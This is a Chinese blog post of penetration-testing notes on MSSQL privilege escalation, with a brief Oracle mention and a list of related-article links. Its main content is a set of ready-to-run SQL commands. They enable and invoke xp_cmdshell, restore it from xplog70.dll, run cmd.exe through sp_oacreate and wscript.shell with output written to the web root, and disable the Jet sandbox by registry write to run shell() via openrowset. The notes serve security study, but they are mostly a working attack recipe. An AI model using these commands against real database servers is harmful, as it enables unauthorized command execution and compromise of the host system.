web-99 权限提升-mssql

已于 2024-09-11 20:46:09 修改
阅读量409 收藏 9
点赞数 3
分类专栏: 内网 文章标签: web安全
于 2024-09-09 23:45:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/token_x/article/details/142071296
版权

mssql使用navicat连接的时候有两种密码模式。一种是使用自己的windows账号密码,一种是输入账号密码

mssql提权

翻找密码

主要是使用系统自带的组件进行提权<xp_cmdshellsp_oacreate,这两个都sqlserver自带的存储过程。在master-存储过程中

文章推荐

SQL Server提权总结与记录-xp_cmdshell/sp_oacreate/sandbox提权_sqlcmd提权应用-CSDN博客

0x01 xpcmdshell提权
 EXEC master.dbo.xp_cmdshell 'whoami' 

直接调用xpcmdshell进行命令执行;但是有时候会把这个系统组件给关闭,相当于一个防护,这时候可以使用命令开启,或者使用另外一个函数oacrate

报错

-2147217900:[Microsoft][ODBC SQL Server Driver][SQL Server]SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 

就可以启用xpcmdshell

EXEC sp_configure 'show advanced options',1
RECONFIGURE
go
sp_configure 'xp_cmdshell',1   #关闭把参数置0即可
RECONFIGURE
go

如果xp_cmdshell被删除,则可以通过下列命令重新加载。

dbcc addextendedproc("xp_cmdshell","xplog70.dll");

如果连xplog70.dll也被删除,则可以通过下列命令恢复(未验证)
 

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';

0x02 sp_oacreate提权

文章推荐非常详细

https://blog.csdn.net/u014029795/article/details/116910134
使用命令创建文件到网站根目录后再去查看文件内容

declare @shell int;
exec sp_oacreate 'wscript.shell',@shell output;
exec sp_oamethod @shell,'run',null,'C:\\windows\\system32\\cmd.exe /c whoami > C:\\Inetpub\\wwwroot\\1.txt';

开启sp_oacreate命令

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures',1;    #关闭使该参数置空即可
RECONFIGURE

 0x03 sqlserver沙盒模式提权

执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("whoami")')

没有开启的话报错,通过下面命令开启组件

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;

接着关闭沙盒

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

沙盒模式`SandBoxMode`参数含义(默认是2)
0:在任何所有者中禁止启用安全模式
1 :为仅在允许范围内
2 :必须在access模式下
3:完全开启

步骤

开启组件,关闭沙盒,查询等级是否为0,执行系统命令

查询等级为0才行,停止使用任何安全模式

oracle提权

 目录翻找数据库配置文件

直接使用工具提权----oracle-shell

token_x
关注
专栏目录
web-99 权限提升
token_x的博客
09-04 1772
mysql提权
WEB攻防-通用漏洞-SQL 读写注入-MYSQL&MSSQL&PostgreSQL
weixin_45534587的博客
07-23 704
权限注入指的是攻击者通过SQL注入漏洞,利用具有高级权限的数据库账户(如MYSQL的root用户、MSSQL的sa用户、PostgreSQL的dba用户)执行恶意SQL语句。这些高级权限账户能够访问和修改数据库中的所有数据,甚至执行操作系统级别的命令。
第60天-权限提升-MY&MS&ORA 等 SQL 数据库提权
MCTSOG的博客
05-04 664
思维导图 权限提升 数据库提权 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。 数据库应用提权在权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法 目前数据库提权对应的技术及方法等 知识点 提权流程 服务探针---->信息收集----->提权利用----->获取权限 数据库端口号 关系型数
权限提升-MY&MS&ORA等SQL数据库提权
xhscxj的博客
03-02 1128
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能 数据库应用提权在权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法 目前数据库提权对应的技术及方法等 流程:服务探针-信息收集-提权利用-获取权限 一、UDF 提权知识点:(基于 MYSQL 调用命令执行函数) 读取网站数据库配置文件(了解其命名规则及查找技巧).
WEB渗透Web突破篇-SQL注入(SQLMAP)
qq_59468567的博客
07-31 1435
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -p 指定注入点,注入参数 --user-agent 指定user-agent --random-agent 随机user-agent
Notes Twenty one days-渗透攻击-红队-权限提升
热门推荐
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
MSSQL无落地文件执行Rootkit-WarSQLKit
渗透测试研究中心
02-07 265
0x00 前言 在本文中,我们将处理一个很长时间以来一直待解决的问题:MSSQL Rootkit。到目前为止,针对MS-SQL所描述的大多数命令执行都是调用“xp_cmdshell”和“sp_OACreate”存储过程的。因此,如果在没有xp_cmdshell和sp_OACreate存储过程的MSSQL服务器上拥有“sa”帐户或任何具有“sysadmin”权限的用户帐户,我们是否...
ctfshow sql注入 web171-web253 wp
mumuzi的博客
02-02 7729
存货,别说我卷了
内网渗透学习03——权限提升分析与防御
box
02-22 3809
目录0x00 缺失补丁发现1. 命令查询补丁2. 工具查询补丁3. 其他补丁查询工具0x01数据库提权1. mysql数据库2. SQL Server 数据库提权3. Redis提权4. PostgreSql 数据库提权0x02 windows操作系统配置错误1. PowerUp2. AlwaysInstallElevated 提权3. Metasploit service_permissions利用4. 可信服务路径漏洞0x03 组策略首选项提权1. SYSVOL2. Group.xml3. 密码破解方式
MSSQL数据库注入
zhuangsle的博客
08-26 1152
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4468
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 193
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1245
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Web安全攻防
S1942177831的博客
04-07 3368
端口隔离配置的实验
zhgjx_ywz的博客
09-28 751
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 417
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 203
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1151
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
提升数据库安全:MSSQL与MYSQL权限运行设置教程
"这篇教程详细介绍了如何让MSSQL和MYSQL数据库服务器在低权限的账户下运行,以增强系统的安全性,防止权限提升攻击。" 在IT领域,数据库的安全性是至关重要的,尤其是在处理敏感信息时。这篇教程针对MSSQL和MYSQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值